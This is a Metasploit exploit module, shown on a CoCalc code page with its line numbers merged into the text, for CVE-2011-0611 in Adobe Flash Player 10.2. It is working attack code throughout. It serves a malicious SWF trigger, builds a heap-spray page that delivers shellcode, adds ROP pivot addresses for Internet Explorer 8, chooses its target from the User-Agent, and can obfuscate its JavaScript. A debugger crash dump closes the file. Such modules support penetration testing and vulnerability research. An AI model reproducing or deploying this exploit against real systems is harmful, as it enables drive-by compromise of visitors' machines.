CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::RopDb1011def initialize(info={})12super(update_info(info,13'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",14'Description' => %q{15This module exploits a vulnerability in Adobe Flash Player that was discovered,16and has been exploited actively in the wild. By embedding a specially crafted .swf17file, Adobe Flash crashes due to an invalid use of an object type, which allows18attackers to overwrite a pointer in memory, and results arbitrary code execution.19Please note for IE 8 targets, Java Runtime Environment must be available on the20victim machine in order to work properly.21},22'License' => MSF_LICENSE,23'Author' =>24[25'sinn3r',26],27'References' =>28[29[ 'CVE', '2011-0611' ],30[ 'OSVDB', '71686' ],31[ 'BID', '47314' ],32[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],33[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],34[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],35[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],36[ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],37],38'Payload' =>39{40'Space' => 1024,41'BadChars' => "\x00",42},43'DefaultOptions' =>44{45'EXITFUNC' => "process",46'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',47},48'Platform' => 'win',49'Targets' =>50[51[ 'Automatic', {} ],52[53'IE 6 on Windows XP SP3',54{55'Rop' => false,56'Pivot' => nil, #No ROP no pivot57'Offset1' => '0x01', #For aligning the payload58'Offset2' => '0x02', #For aligning the CALL59'Max1' => '0x150', #First spray60'Max2' => '0x200' #Second spray61}62],63[64'IE 7 on Windows XP SP3',65{66'Rop' => false,67'Pivot' => nil, #No ROP no pivot68'Offset1' => '0x01', #For aligning the payload69'Offset2' => '0x02', #For aligning the CALL70'Max1' => '0x150', #First spray71'Max2' => '0x200' #Second spray72}73],74[75'IE 8 on Windows XP SP3',76{77'Rop' => true,78'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)79'Offset1' => '0x5E2', #Offset for rop+payload80'Offset2' => '0x02', #Offset to 0x1111111081'Max1' => '0x250', #First spray82'Max2' => '0x200' #Second spray83}84],85[86'IE 7 on Windows Vista',87{88'Rop' => false,89'Pivot' => nil, #No ROP no pivot90'Offset1' => '0x01', #For aligning the payload91'Offset2' => '0x02', #For aligning the CALL92'Max1' => '0x150', #First spray93'Max2' => '0x200' #Second spray94}95],96[97'IE 8 on Windows 7',98{99'Rop' => true,100'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)101'Offset1' => '0x5F4', #Offset for rop+payload102'Offset2' => '0x02', #Offset to 0x11111110103'Max1' => '0x101', #First spray104'Max2' => '0x300' #Second spray105}106]107],108'Privileged' => false,109'DisclosureDate' => '2011-04-11',110'DefaultTarget' => 0))111112register_options(113[114OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])115], self.class116)117118end119120def exploit121path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")122f = File.open(path, "rb")123@trigger = f.read(f.stat.size)124f.close125super126end127128def get_target(request)129agent = request.headers['User-Agent']130131if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/132#Windows XP SP3 + IE 6.0133return targets[1]134elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/135#Windows XP SP3 + IE 7.0136return targets[2]137elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/138#Windows XP SP3 + IE 8.0 + JRE6139return targets[3]140elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/141#Windows Vista + IE 7142return targets[4]143elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/144#Windows 7 + IE 8 + JRE6145return targets[5]146else147return nil148end149end150151def on_request_uri(cli, request)152#Set default target153my_target = target154155#If user chooses automatic target, we choose one based on user agent156if my_target.name =~ /Automatic/157my_target = get_target(request)158if my_target.nil?159print_error("Sending 404 for unknown user-agent")160send_not_found(cli)161return162end163vprint_status("Target selected: #{my_target.name}")164end165166vprint_status("URL: #{request.uri}")167168if request.uri =~ /\.swf$/169#Browser requests our trigger file, why not170print_status("Sending trigger SWF...")171send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )172return173end174175#Targets that don't need ROP176pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c177pivot << "\xff\xe0" #JMP EAX178pivot << "\x41" #Pad179180#Targets that need ROP181if my_target['Rop']182#Target Addr=0x11111110183pivot =184[1850x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot186my_target['Pivot'], # ROP Pivot1870x7c346b52, # EAX (POP ESP; RETN)188].pack('V*')189190#Target Addr=0x0c0c0c0c191p = generate_rop_payload('java', payload.encoded)192else193p = payload.encoded194end195196arch = Rex::Arch.endian(my_target.arch)197198shellcode = Rex::Text.to_unescape(p, arch)199pivot = Rex::Text.to_unescape(pivot, arch)200201#Extract string based on target202if my_target.name == 'IE 8 on Windows 7'203js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"204elsif my_target.name == 'IE 8 on Windows XP SP3'205js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"206else207js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"208end209210randnop = rand_text_alpha(rand(100) + 1)211js_nops = Rex::Text.to_unescape("\x0c"*4)212213js = <<-JS214function heap_spray(heaplib, nops, code, offset, max) {215while (nops.length < 0x2000) nops += nops;216var offset = nops.substring(0, offset);217var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);218while (shellcode.length < 0x40000) shellcode += shellcode;219#{js_extract_str}220heaplib.gc();221for (var i=1; i<max; i++) {222heaplib.alloc(block);223}224}225226var heap_obj = new heapLib.ie(0x20000);227var #{randnop} = "#{js_nops}";228var nops = unescape(#{randnop});229var code = unescape("#{shellcode}");230heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});231var fake_pointers = unescape("#{pivot}");232heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});233JS234235js = heaplib(js, {:noobfu => true} )236237#Javascript obfuscation is optional238if datastore['OBFUSCATE']239js = ::Rex::Exploitation::JSObfu.new(js)240js.obfuscate(memory_sensitive: true)241end242243trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"244245html = <<-EOS246<html>247<head>248<script>249#{js}250</script>251</head>252<body>253<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"254codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">255<param name="movie" value="#{trigger_file_name}" />256<embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"257pluginspage="http://www.macromedia.com/go/getflashplayer">258</embed>259</body>260</html>261EOS262263html = html.gsub(/^ {4}/, "")264265print_status("Sending HTML to...")266send_response(cli, html, {'Content-Type' => "text/html"} )267end268end269270271=begin2720:000> r273eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0274eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc275cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202276Flash10o+0xd01f6:277100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????2780:000> dd ecx27901d650b0 11111110 00000000 00000000 0000000028001d650c0 00000000 00000000 00000000 0000000028101d650d0 00000000 00000000 00000000 0000000028201d650e0 00000000 00000000 00000000 0000000028301d650f0 00000000 00000000 00000000 0000000028401d65100 00000000 00000000 00000000 0000000028501d65110 00000000 00000000 00000000 0000000028601d65120 00000000 00000000 00000000 00000000287288=end289290291